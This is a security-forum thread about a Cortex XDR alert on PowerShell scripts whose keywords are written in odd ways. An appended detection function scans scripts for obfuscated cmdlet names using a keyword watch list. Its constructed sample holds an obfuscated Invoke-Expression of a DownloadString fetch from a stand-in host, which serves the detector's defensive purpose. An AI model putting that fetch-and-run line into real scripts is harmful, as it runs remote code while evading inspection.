08-09-2024 12:49 AM
Hello everyone,
I just received this alert, "Script Activity - 245655498", with the description "Suspicious script with keywords written in a non-standard way." in Cortex multiple times, related to PowerShell script execution on a developer machine. The executed scripts were different, and I don't know why Cortex is blocking such executions. There is also no documentation on this.
Alert source: XDR Agent
Initiator and CGO path are the same in one of the alerts: "C:\Program Files\PowerShell\7\pwsh.exe" -WindowStyle Minimized -file c:\folder1\script.ps1
Thank you for your help 🙂
08-19-2024 09:13 AM
Hello @Arman_Zaheri
Thanks for reaching out on live community!
This alert is due to the use of suspicious keywords/parameters in the script which may be in line with malicious behaviour. Please investigate the causality chain and the involved command line. If the script is benign and executed by your employees for a legitimate purpose, then you may need to create an exception for it. To create an exception, identify the module which triggered the alert from the alert table. Then, based on either the script location or the command line, you can create an exception for the module and apply it to the particular profile which was applied to the developer machines.
Please open a support case if you need more help with alert investigation/exception.
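Before creating an exception, it helps to see which construct in the flagged script could count as a keyword "written in a non-standard way". The function below is an added example, not code from this thread or from Palo Alto Networks, and it does not reproduce the Cortex heuristic, which is not documented here. It scans a script's text for three common PowerShell obfuscation patterns, all of which are assumptions about what such a rule looks for: a cmdlet name split with backticks (Inv`oke-Expression), a name in non-canonical casing (iNvOkE-eXpReSsIoN), and a name assembled from quoted fragments ('Invoke-Ex' + 'pression'). The keyword watch list and the sample script text are constructed for the example; the path c:\folder1\script.ps1 is the one from the alert in the question.

```powershell
# Added example (not from the thread). The alert's exact heuristic is unknown;
# the three checks and the watch list below are assumptions for illustration.
function Find-NonStandardKeyword {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Text,
        # Assumed watch list, not Cortex's own.
        [string[]] $Keywords = @(
            'Invoke-Expression', 'Invoke-WebRequest', 'DownloadString',
            'FromBase64String', 'Start-Process', 'Add-Type'
        )
    )

    # lower-case spelling -> canonical spelling
    $canon = @{}
    foreach ($k in $Keywords) { $canon[$k.ToLowerInvariant()] = $k }

    $findings = [System.Collections.Generic.List[object]]::new()
    $lineNo = 0
    foreach ($line in ($Text -split '\r?\n')) {
        $lineNo++

        # Checks 1 and 2: bare words, possibly containing backticks, compared
        # case-sensitively against the canonical spelling of a watched keyword.
        foreach ($m in [regex]::Matches($line, '[A-Za-z`][A-Za-z0-9`-]*')) {
            $raw  = $m.Value
            $norm = $raw -replace '`', ''
            $key  = $norm.ToLowerInvariant()
            if (-not $canon.ContainsKey($key)) { continue }
            $why = @()
            if ($raw.Contains('`'))      { $why += 'backtick-split' }
            if ($norm -cne $canon[$key]) { $why += 'non-canonical case' }
            if ($why.Count -gt 0) {
                $findings.Add([pscustomobject]@{
                    Line = $lineNo; Keyword = $canon[$key]; Raw = $raw; Reason = ($why -join ', ')
                })
            }
        }

        # Check 3: a keyword assembled from quoted fragments joined with '+'.
        foreach ($m in [regex]::Matches($line, '(?:["''][^"'']*["'']\s*\+\s*)+["''][^"'']*["'']')) {
            $joined = $m.Value -replace '["''\s+]', ''
            $key = $joined.ToLowerInvariant()
            if ($canon.ContainsKey($key)) {
                $findings.Add([pscustomobject]@{
                    Line = $lineNo; Keyword = $canon[$key]; Raw = $m.Value; Reason = 'string concatenation'
                })
            }
        }
    }
    return $findings
}

# Constructed sample text, not a real developer script; it is only scanned, never executed.
$sample = @'
# constructed sample
$u = 'https://example.invalid/build.ps1'
iNvOkE-eXpReSsIoN (New-Object Net.WebClient).DownloadString($u)
& ('Invoke-Ex' + 'pression') $payload
Inv`oke-Expression $x
Start-Process pwsh -ArgumentList '-file build.ps1'
'@

Find-NonStandardKeyword -Text $sample | Format-Table -AutoSize

# Against the script named in the alert:
# Find-NonStandardKeyword -Text (Get-Content -Raw 'c:\folder1\script.ps1')
```

In the constructed sample, the mixed-case, concatenated and backtick-split spellings of Invoke-Expression are reported, while the canonically spelled Start-Process and DownloadString calls are not. The scan is text-based, so it also reports matches inside comments and string literals; read each finding in context. If a developer script turns out to build cmdlet names from fragments or uses odd casing for no reason, rewriting it in plain form is usually a better fix than adding an exception, because an exception by script location or command line also covers anything later placed at that path or run with that command line.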